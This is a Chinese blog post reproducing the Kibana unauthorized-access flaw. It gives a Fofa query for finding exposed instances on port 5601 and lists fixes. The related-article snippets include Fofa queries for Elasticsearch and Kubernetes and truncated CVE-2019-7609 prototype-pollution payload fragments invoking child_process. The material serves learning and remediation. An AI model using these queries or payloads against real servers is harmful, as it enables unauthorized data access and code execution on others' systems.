Kibana未授权访问漏洞

最新推荐文章于 2024-08-09 16:47:27 发布
最新推荐文章于 2024-08-09 16:47:27 发布
阅读量518 收藏 1
点赞数 10
分类专栏: 未授权访问漏洞 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57524749/article/details/140919626
版权

漏洞信息

Kibana如果允许外网访问且没有做安全登录认证,就会被外部任意访问,查看所有数据,造成数据泄露。在默认配置下,Kibana就可以访问Elasticsearch中的所有数据

漏洞复现

步骤一:使用以下Fofa语句搜索Kibana产品...并打开页面.. 

"kibana" && port="5601"

步骤二:直接访问Kibana的页面且无需账号密码可以登陆进入界面. 

漏洞修复

1.升级Kibana到最新版本,升级地址如下https://www.elastic.co/cn/downloads/kibana。
2.在kibana所在的服务器上安装nginx服务,利用nginx的转发指令实现,需要输入账号密码才可以访问页面。
3.如果正常业务中 kibana 服务需要被其他服务器来访问,可以通过 iptables 策略,仅允许指定的 IP来访问服务。


 

这河狸吗.
关注
  • 10
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kibana授权访问漏洞记录(CVE-2019-7609,Kibana的RCE,原型链污染,端口:5601)
墨痕诉清风的博客
11-12 5247
漏洞描述 Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.15到6.6.1之间的版本中存在一处原型链污染漏洞,利用这个漏洞我们可以在目标服务器上执行任意JavaScript代码。 漏洞复现 环境启动后,访问 http://your-ip:5601 即可看到Kibana页面。 原型链污染发生在“Timeline”页面,我们填入如下Payload: 创建文件 .es(*).props(label.__proto__.env.AAAA='require("chil
web渗透测试漏洞复现:Kibana 授权访问
HACKONE的博客
03-20 591
Kibana是一个开源的分析与可视化平台,设计出来用于和Elasticsearch一起使用的。你可以用kibana搜索、查看存放在Elasticsearch中的数据。Kibana与Elasticsearch的交互方式是以各种不同的图表、表格、地图等直观地展示数据,从而达到高级的数据分析与可视化的目的。Elasticsearch、Logstash和Kibana这三个技术就是我们常说的ELK技术栈,可以说这三个技术的组合是大数据领域中一个很巧妙的设计。一种很典型的MVC思想,模型持久层,视图层和控制层。
授权访问漏洞(2)
weixin_66503195的博客
08-05 288
在fofa中搜索port="'8080"" && app="Kubernetes'在fofa中搜索"Elasticsearch" && port="9200"打开后若无需登录,则存在漏洞
Kibana,Docker Remote Api,Kubernetes Api Server我授权访问漏洞(附带修复方法)
最新发布
C233333235的博客
08-09 825
⼀种很典型的MVC思想,模型持久层,视图层和控制层。⽽我们这章的主题Kibana担任视图层⻆⾊,拥有各种维度的查询和分析,并使⽤图形化的界⾯展示存放在Elasticsearch中的数据。攻击者⽆需认证即可访问到Docker数据,可能导致敏感信息泄露,⿊客也可以删除 Docker上的数据,直接访问宿主机上的敏感信息,或对敏感⽂件进⾏修改,最终完全控制服务器。Docker是⼀个开源的应⽤容器引擎,让开发者可以打包他们的应⽤以及依赖包到⼀个可移植的容器中,然后发布到任何流⾏的LINUX机器上,也可以实现虚拟化。
Kibana授权访问漏洞复现、CVE-2019-7609 Kibana远程代码执行漏洞复现
热门推荐
weixin_43061533的博客
12-25 1万+
0x01 漏洞简述 Kibana如果允许外网访问,没有做安全的登录认证,也会被外部随意访问查看所有的数据,造成少数据泄露。在默认配置下,Kibana就可以访问Elasticsearch中的所有数据。 0x02 知识扩展 Kibana是一个开源的分析与可视化平台,设计出来用于和Elasticsearch一起使用的。你可以用kibana搜索、查看存放在Elasticsearch中的数据。Kibana与Elasticsearch的交互方式是各种不同的图表、表格、地图等,直观的展示数据,从而达到高级的数据分析
Elasticsearch 核心插件Kibana 本地文件包含漏洞分析(CVE-2018-17246)
ahhacker86的专栏
01-23 1359
LFI通常出现在PHP应用中,通样是require这次应用在Nodejs程序中,相信来还会有更多的Nodejs程序存在这种问题,原因是本地包含漏洞出现了很多年,但依旧有很多软件开发人员和架构师没有考虑到这点,这篇文章很好的说明了Kibana中存在的一个关键LFI漏洞,使得攻击者能够在服务器上运行本地代码,可造成直接的危害就是拒绝服务攻击,若在生产环境下业务实在伤不起,需要引起对Nodejs LFI的重视。
Kibana任意文件包含漏洞(CVE-2018-17246)
EC_Carrot的博客
07-07 833
漏洞详细 Kibana是一个开源的分析与可视化平台,设计出来用于和Elasticsearch一起使用的。其5.6.13到6.4.3之间的版本存在一处文件包含漏洞,通过这个漏洞攻击者可以包含任意服务器上的文件。如果能够上传一个文件,就能够包含该文件来执行代码。 漏洞复现 首先在靶机内创个代码文件,以便后续操作 #echo '...code...' > /tmp/vulhub.js export default {asJson: function() {return require("child_proc
elasticsearch授权访问 漏洞修复
05-09
本文将详细讲解如何修复 Elasticsearch 的授权访问漏洞,并设置账号密码。 首先,对于单节点的 Elasticsearch 部署,我们需要编辑配置文件 `/etc/elasticsearch/elasticsearch.yml`。在该文件中添加以下内容: 1...
Windows下Elasticsearch授权访问【原理扫描】漏洞修复
star的博客
07-09 3293
Elasticsearch漏洞扫描结果如下: 根据给出的解决办法,验证之后发现漏洞无法修复: elasticsearch-http-basic就提供了针对ES HTTP连接的IP白名单、密码权限和信任代理功能。 支持版本如下: 发现高版本的elasticsearch不支持elasticsearch-http-basic插件。 elasticsearch6.8及以上版本默认有x-pack认证插件,X-Pack是Elastic Stack扩展功能,提供安全性,警报,监视,报告,机器学习和.
授权访问漏洞总结
m0_64481831的博客
06-18 1291
以下总结了常见的授权访问漏洞,还在持续更新中,遇到就会补充。欢迎大家关注~
授权访问漏洞
m0_63944205的博客
08-04 390
应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。修改docker swarm的认证方式,使用TLS认证:Overview Swarm with TLS 和 Configure DockerSwarm for TLS这两篇文档,说的是配置好TLS后,DockerCLl在发送命令到docker daemon之前,会首先发送它的证书,如果证书是由daemon信任的CA所签名的,才可以继续执行。
Kibana 原型链污染导致任意代码执行漏洞 (CVE-2019-7609)
EnerY3的博客
12-12 817
CVE-2019-7609 是一个存在于 Kibana 5.6.15 到 6.6.1 版本中的远程代码执行漏洞,它允许攻击者通过原型链污染(Prototype Pollution)在目标服务器上执行任意 JavaScript 代码。这个漏洞是由于 Timelion 组件中的安全问题导致的。
生命在于学习——授权访问漏洞
易水哲的博客
09-01 1万+
授权访问漏洞的学习。
【严重】Kibana 8.7.0 任意代码执行漏洞
murphysec的博客
05-23 1297
Kibana是用于Elasticsearch的数据可视化仪表板。Kibana在8.7.0版本引入了Synthetic监控功能,用户可配置编写playwright中的javascript代码实现web应用监控。 具备Kibana登录权限的攻击者可利用此功能编写恶意playwright脚本, 从而在Kibana主机中执行任意系统命令。
kibana 漏洞收集总结
sojrs_sec的博客
12-31 7685
一:cve-2019-7609 命令执行 Kibana存在远程代码执行漏洞,影响版本为5.6.15和6.6.0之前的所有版本。拥有Kibana的Timelion模块访问权限的人可以以Kibana的运行权限执行任意代码,包括反弹shell 访问 http://ip:5601/app/timelion 输入payload .es(*).props(label.__proto__.env.AAAA='...
kibana漏洞复现
Shanfenglan's blog
11-30 2359
文章目录1. kibana是什么2. CVE-2018-17246 文件包含漏洞2.1 利用3. Kibana 原型链污染导致任意代码执行漏洞 (CVE-2019-7609)3.1 利用 1. kibana是什么 一般与Elasticsearch一起工作,作用是将Elasticsearch中的数据可视化的表现出来并与之进行交互。它本身是一个web应用,可以通过5601端口去访问。 2. CVE-2018-17246 文件包含漏洞 影响版本: 5.6.13到6.4.3 2.1 利用 通常情况下Kibana
Elasticsearch授权访问漏洞复现
05-18
Elasticsearch授权访问漏洞是指攻击者可以通过访问Elasticsearch的默认端口(9200)获取敏感信息,甚至可以对数据进行修改和删除。下面是一个简单的复现过程: 1. 下载安装Elasticsearch 首先需要下载并安装Elasticsearch,可以从官网 https://www.elastic.co/downloads/elasticsearch 下载适合自己操作系统的版本。安装完成后启动Elasticsearch。 2. 测试授权访问 使用curl命令访问Elasticsearch的默认端口,可以看到返回的json格式数据,其中包含了Elasticsearch的版本信息、集群名称等。 ``` curl http://localhost:9200/ ``` 如果返回的结果中包含了类似以下内容,说明Elasticsearch存在授权访问漏洞。 ``` { "name" : "node-1", "cluster_name" : "elasticsearch", "cluster_uuid" : "zZl94mWlQq6RQlN4WmAz5w", "version" : { "number" : "7.9.3", "build_flavor" : "default", "build_type" : "tar", "build_hash" : "c4138e51121ef06a6404866cddc601906fe5c868", "build_date" : "2020-10-16T10:36:16.141335Z", "build_snapshot" : false, "lucene_version" : "8.6.2", "minimum_wire_compatibility_version" : "6.8.0", "minimum_index_compatibility_version" : "6.0.0-beta1" }, "tagline" : "You Know, for Search" } ``` 3. 利用授权访问漏洞 利用授权访问漏洞可以进行一些危害性较大的操作,比如删除数据、创建索引等。这里我们只演示一下获取敏感信息的操作。 使用curl命令访问Elasticsearch中的某个索引,可以看到其中包含了一些敏感信息,比如用户名、密码等。 ``` curl http://localhost:9200/_cat/indices ``` 如果返回的结果中包含了类似以下内容,说明存在敏感信息泄露。 ``` yellow open .kibana_task_manager_1 6rJQh5E8R0yUH9WdPQzLrw 1 1 3 0 35.4kb 35.4kb yellow open .kibana_1 5QZvZnS-QOyvZBTl2t6bKg 1 1 2 0 13.4kb 13.4kb ``` 4. 解决方法 为避免Elasticsearch的授权访问漏洞,可以进行以下操作: - 修改配置文件中的network.host配置,限制Elasticsearch只能在特定的IP地址或网段上运行。 - 启用Elasticsearch的安全特性,比如启用访问控制、数据加密等。 以上是Elasticsearch授权访问漏洞的简单复现过程,希望对您有帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值